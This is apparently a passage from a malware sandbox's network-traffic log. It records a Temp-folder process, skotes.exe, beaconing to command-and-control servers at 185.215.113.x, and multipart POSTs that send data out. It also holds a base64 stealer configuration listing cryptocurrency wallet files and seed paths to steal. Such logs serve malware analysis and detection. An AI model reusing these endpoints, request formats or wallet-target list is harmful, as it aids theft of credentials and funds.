[TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 13, 2024 18:55:14.142221928 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCG Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 39 64 39 30 66 63 33 38 61 30 30 33 36 32 63 62 38 32 33 33 31 36 38 65 36 33 36 65 37 39 38 34 61 66 38 39 30 35 36 33 35 63 31 30 33 31 61 63 38 66 64 30 38 36 32 38 30 63 32 31 62 61 34 31 38 39 62 61 36 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 2d 2d 0d 0a Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"1e9d90fc38a00362cb8233168e636e7984af8905635c1031ac8fd086280c21ba4189ba64------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="message"files------HIDGCFBFBFBKEBGCAFCG--
Dec 13, 2024 18:55:14.604484081 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:55:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	50062	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:54:57.406609058 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:54:58.686089039 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:54:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	50067	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:02.298863888 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:03.665749073 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	50070	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:05.891383886 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:07.236747980 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50074	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:09.397217989 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:55:10.713596106 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50078	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:12.907296896 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:55:14.246449947 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:55:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.7	50089	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:14.072408915 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:15.163093090 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:13:43 GMT Age: 27692 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:15.395291090 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:15.709722996 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:13:43 GMT Age: 27692 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.7	50101	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:15.542954922 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.7	50104	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:15.841928005 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:16.929960012 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21347 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:16.942291975 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:17.261697054 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21348 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:17.349872112 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:17.664769888 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21348 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:17.879781008 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:18.195218086 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21349 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:18.221966982 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:18.539351940 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21349 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:18.594249010 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:18.910581112 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21349 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:19.441296101 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:19.756200075 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21350 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:20.741569996 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:21.063265085 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21351 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:22.143821955 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:22.458889961 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21353 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:23.397285938 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:23.712269068 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21354 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:33.535763979 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:33.851351976 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21364 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:39.712461948 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:40.027507067 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21370 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:43.289665937 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:43.604672909 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21374 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:44.636641979 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:44.954420090 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21375 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:48.981086016 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:49.296098948 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21380 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:55:55.717158079 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:55:56.032355070 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21386 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:56:06.112324953 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:13.208201885 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:56:13.541626930 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21404 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:56:14.520673037 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:56:14.837238073 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21405 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:56:24.914530993 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:35.108735085 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:37.364729881 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:56:37.681556940 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21428 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:56:47.718255997 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:57.913122892 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:08.110266924 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:18.313376904 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:28.509560108 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:38.705940962 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:48.919605017 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:58.884973049 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:57:59.199915886 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21510 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:58:16.673372030 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:58:16.988051891 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21527 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:58:17.866439104 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
